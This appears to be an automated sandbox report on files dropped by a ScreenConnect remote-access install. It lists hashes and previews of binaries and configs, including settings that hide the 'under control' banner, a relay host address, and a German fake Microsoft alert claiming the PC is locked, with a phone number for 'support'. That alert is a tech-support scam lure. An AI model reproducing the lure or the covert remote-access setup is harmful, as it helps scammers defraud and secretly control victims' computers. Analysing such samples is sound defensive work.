                                                                                                                                                                                                                                        SSDEEP:6144:qL2DLhOnlTQatfpw7TkJ9/KeZBFR/Zw7VTcWt5jv8jyEzR39GBCquq1MSRq/sree:qLMhOeM52aBFcTbkdqRR6EX
                                                                                                                                                                                                                                        MD5:DA6B59FA5636B53C758E796A3226ADB7
                                                                                                                                                                                                                                        SHA1:3B6DC82FFD7097455E703C1FC729A1D0F8815898
                                                                                                                                                                                                                                        SHA-256:CCE6DC73141C3E41E026131967AF21BEF625F903FA275913598A55B4D4997678
                                                                                                                                                                                                                                        SHA-512:760B5A348D8E4CA1DEC36420F2C1B979F715650EA691235C2053D5DDCE5228D0652C9FF7A420717A1290F001C8DDB88C83ABC65FFE892DAFF6761B12C0588CBA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q............" ..0..\..........Bv... ........... ...............................-....@..................................u..O.......t...........................Pu..8............................................ ............... ..H............text...PZ... ...\.................. ..`.rsrc...t............^..............@..@.reloc...............b..............@..B................!v......H........C..41...................t........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..dows_4b14c015c87c1ad8_0018.0004_none_5860f5d9394b5d90\ScreenConnect.Windows.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1726976
                                                                                                                                                                                                                                        Entropy (8bit):6.640049744810174
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:cOgsFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:FgsJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                        MD5:7E3BCFD89F41083DD30725A9F9C4D0C9
                                                                                                                                                                                                                                        SHA1:B68092FDCF113381B31861C79394AFA0E235252E
                                                                                                                                                                                                                                        SHA-256:FE8C56F3CD7D2EF529DF28756F8C9F961F0DDC81B1F1FBEAC7CE69011AD06E74
                                                                                                                                                                                                                                        SHA-512:C93D0EFD94CD4A34C30816B0371A698187AFFBFA9D74F91E93C48EC69CB7BD94A03ECCC0D6039013ABA7BF6EA16B9ADF996F40562208AEF752B93CCE6EA7FCA3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^............" ..0..R...........q... ........... ....................................@..................................p..O.......|............................p..8............................................ ............... ..H............text....Q... ...R.................. ..`.rsrc...|............T..............@..@.reloc...............X..............@..B.................p......H.......................d...0....o........................................(+...*^.(+..........%...}....*:.(+.....}....*:.(+.....}....*:.(+.....}....*..s,...*..s-...*:.(......(/...*..{0...*"..}0...*J.(1........(2...&*:.(......(3...*..{4...*"..}4...*.0..(........(5......+.............(2...&..X....i2.*v.(.....s6...}.....s7...}....*v.{.....r...p(...+.....o9....*.0...........o:....+..o;......(...+&.o....-....,..o......*..........."........{..........o<...&.......(.....*....0..L...

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602392
                                                                                                                                                                                                                                        Entropy (8bit):6.179677334154197
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:ayB4P+n4htgqvqURfRa5CgSM4ZrvR/YKcSAwqrKyKKj414Sc4q2/R4IEyCui5AS2:FB4KsgqyUuiXrveKtCa3CNax
                                                                                                                                                                                                                                        MD5:E1E1E3C901F0DEC41B87113165A30ACB
                                                                                                                                                                                                                                        SHA1:AC5F3D13A4084D53D3E0CCE104A9284D998E2B1A
                                                                                                                                                                                                                                        SHA-256:C59947E7D0477E143B3EE9A63F60096F24A07AC4FC018F061473F6D548CBECA4
                                                                                                                                                                                                                                        SHA-512:48716CAF09228AF3D9CD34772AC64CCFFE9FC292EF6CDCC926E885FC10A1BF97B2E889A5F8577CD3C0E55FF00EBD436112ABC1D9B12F57C23B43CC29A1B58172
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u..........."...0.................. ... ....@.. .......................`......1c....@.................................Q...O.... ...................)...@..........8............................................ ............... ..H............text...x.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........I..<...................(.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9fe7bca0c4ca064\ScreenConnect.Client.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                        Entropy (8bit):6.586698462937567
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:zxLtNGBlIyS7/OXjusqVFJRJcyzvyqSmzDvJXYz:htNGBGySaXqPJY5qSmG
                                                                                                                                                                                                                                        MD5:5F31CB0A5524DF64FEFF668D581F075E
                                                                                                                                                                                                                                        SHA1:F111EFE5C55E42BE6CE2ED9E5703E30A5D743D43
                                                                                                                                                                                                                                        SHA-256:47D471E33377DB7F96FF84B4CFCC420CF770A77219BCB0CE55446490211A5DF3
                                                                                                                                                                                                                                        SHA-512:0DEB969C51D1A7B1A8B608BD47A77940E6A88E8AAD7534800C2C2D5DFDFC298F02128C8D9742ABE3019D9EBEB5906185D6C3DD159C29749B2A903F04A28B18E6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`......j{....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\2egg40ma.newcfg

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.030538403989238
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDYJ/vXbAa3xT:2dL9hK6E46YPRNYYhvH
                                                                                                                                                                                                                                        MD5:BB6B4EE5CC71E45AAC2211191C42CF0C
                                                                                                                                                                                                                                        SHA1:170ADD895864294F2A8A29BDDF0950A6826DA5CE
                                                                                                                                                                                                                                        SHA-256:27B09BBE2B6D0B4F392960324E7CB772649808ACB3EBE131FD9CDE638C8AADF6
                                                                                                                                                                                                                                        SHA-512:033D0602F07D37B9A02765B204D3E0DAC5AA4C98C7D665257C12FF583D2FB05648842924098D97C52C1D7E8A30CF87C51966A6100934514245BD75E74B4F7546
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a23%3a19</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\4ads4gzi.newcfg

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.028155548408631
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDYHv/vXbAa3xT:2dL9hK6E46YPRNYYXvH
                                                                                                                                                                                                                                        MD5:ADE9656BFE9F73F3C2C3248660D09E1A
                                                                                                                                                                                                                                        SHA1:14EABB2A06324B4772EAEA06B8A9CF052694A751
                                                                                                                                                                                                                                        SHA-256:7571A5D9AF8C14DE5B9584F8DBF4FFAB3F84B538D57F8BC9A94E34DD1287109E
                                                                                                                                                                                                                                        SHA-512:1BA5056912FCF4B9A48F601856AB0B70A53F44121EC0CAF2CE034E1561AC817C425B2F4B96EF719BF0497218C5D57CF2F9E4CD350407FFFA2F44250A22F34069
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a23%3a17</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\Client.Override.en-US.resources

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):469
                                                                                                                                                                                                                                        Entropy (8bit):5.1947802885938765
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:rHy2DLI4MWoj12tyiUPDLdex+so94yZ+z4eBW5/ojt:zHE40CyiU7kx+ztpsW5wjt
                                                                                                                                                                                                                                        MD5:87AFFF981C910A9EB12EB029BD9E7EA3
                                                                                                                                                                                                                                        SHA1:773092BD0A0CF3FBC7DFB613EA2286970A447D04
                                                                                                                                                                                                                                        SHA-256:A75C86E6AF09D1142FCEB4BD03D4B9AE99EB8CED2DF18B7BB0BCC3C02EBD7BC7
                                                                                                                                                                                                                                        SHA-512:093754DD7069C2010ED2E9BFFE50B7B9446BCA0FB9BF938C6764E63B3E9B41B1E931A454F1C1A51E0EB3690C5F17F9A370390D4530FE7DE0E701A62BBA1258B9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.2..........2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t........Microsoft Windows Firewall Alert. Bedrohung erkannt: Pornografische Spyware(Fehler Code: 2V7HGTVB). Der Zugriff auf diesen PC wurde aus Sicherheitsgr.nden gesperrt. Rufen Sie sofort den Microsoft-Support an: 02113 853 9798

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\Client.en-US.resources

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50133
                                                                                                                                                                                                                                        Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                        MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                        SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                        SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                        SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\Client.resources

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26722
                                                                                                                                                                                                                                        Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                        MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                        SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                        SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                        SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\app.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2521
                                                                                                                                                                                                                                        Entropy (8bit):4.722241607101165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:Wh95AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdHeGH3dHYE:A92H82HzHAHyHVHeHMHZHUH1HyHkHNHf
                                                                                                                                                                                                                                        MD5:12BCC42E00642FCAB74FCC3278280476
                                                                                                                                                                                                                                        SHA1:B92BEDB9510465FD9BCB2A533BD2036ACA651BC4
                                                                                                                                                                                                                                        SHA-256:5CA9095363FC45B593A7E632F964A615FD61DBBED2DA792C91DD1854EFC77C89
                                                                                                                                                                                                                                        SHA-512:692CC402BC22E55D79C4C4B5097BF48F65D813C0E28CA176C71E783DE621ECA5EAAFB745C9EDA534857776D3B014088DCC0116FBB9DC13BCC4A6D3285FC24A69
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\bztvga4o.newcfg

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.028155548408631
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDYC5/vXbAa3xT:2dL9hK6E46YPRNYYCRvH
                                                                                                                                                                                                                                        MD5:F2B508086B50069A37A6DBA07AF6CE62
                                                                                                                                                                                                                                        SHA1:DC53B1C2AD9C9ABA41F307E6CDB547029396133B
                                                                                                                                                                                                                                        SHA-256:31E3EB97C15C09ED60CBE9E875BC72099BE8F0F6679A9F409374021B8D8A83E8
                                                                                                                                                                                                                                        SHA-512:3124968125928CC8D206E11568BD4980113175FD713F434915F56AD0FB4C49F78D2FDC46B22A3C7A10AAD39094BD6D02497C6BC76A4863DFDABBCB6035EFFDAC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a23%3a14</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\fcwv5zan.newcfg

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.032078948580715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDcJ/vXbAa3xT:2dL9hK6E46YPRNY6vH
                                                                                                                                                                                                                                        MD5:701E18B7C659CD6B9F92A1C6DE4A3439
                                                                                                                                                                                                                                        SHA1:131C4490F0BFB6FAC48732755664CA046EA92147
                                                                                                                                                                                                                                        SHA-256:722552B613566B31F2B4A4A08F850202B8C3110BEFAC97243F14FD44FB28404E
                                                                                                                                                                                                                                        SHA-512:144D075803A65C884F55CED118139F9921907F538920AE30D044C2AA8EEC999E4699D922D93AB9B2952C2A7BA9B987F3D0C52A8307B831FECA426CA4F13538C6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a23%3a59</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ixgz2tlh.newcfg

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.028331853275931
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCD95m/vXbAa3xT:2dL9hK6E46YPRNYr8vH
                                                                                                                                                                                                                                        MD5:D50C74E9CB4114023EA898F4623E8233
                                                                                                                                                                                                                                        SHA1:24AF928C38EDEC65357652A6A71C9379F6306888
                                                                                                                                                                                                                                        SHA-256:5875DC8A8B96DC0A7A437268C2E4D3DF9A32FDE08DBA45F7B13EE570EA30D8E4
                                                                                                                                                                                                                                        SHA-512:C8ECC1D70CD51E4492A5A55266CA88629D095256444AF484F7B22737D033FC51E050D70E62F0E17F5E96D4BB9BAB15A4616E7C7CDC757792153396D18A5907EF
                                                                                                                                                                                                                                        Malicious:false
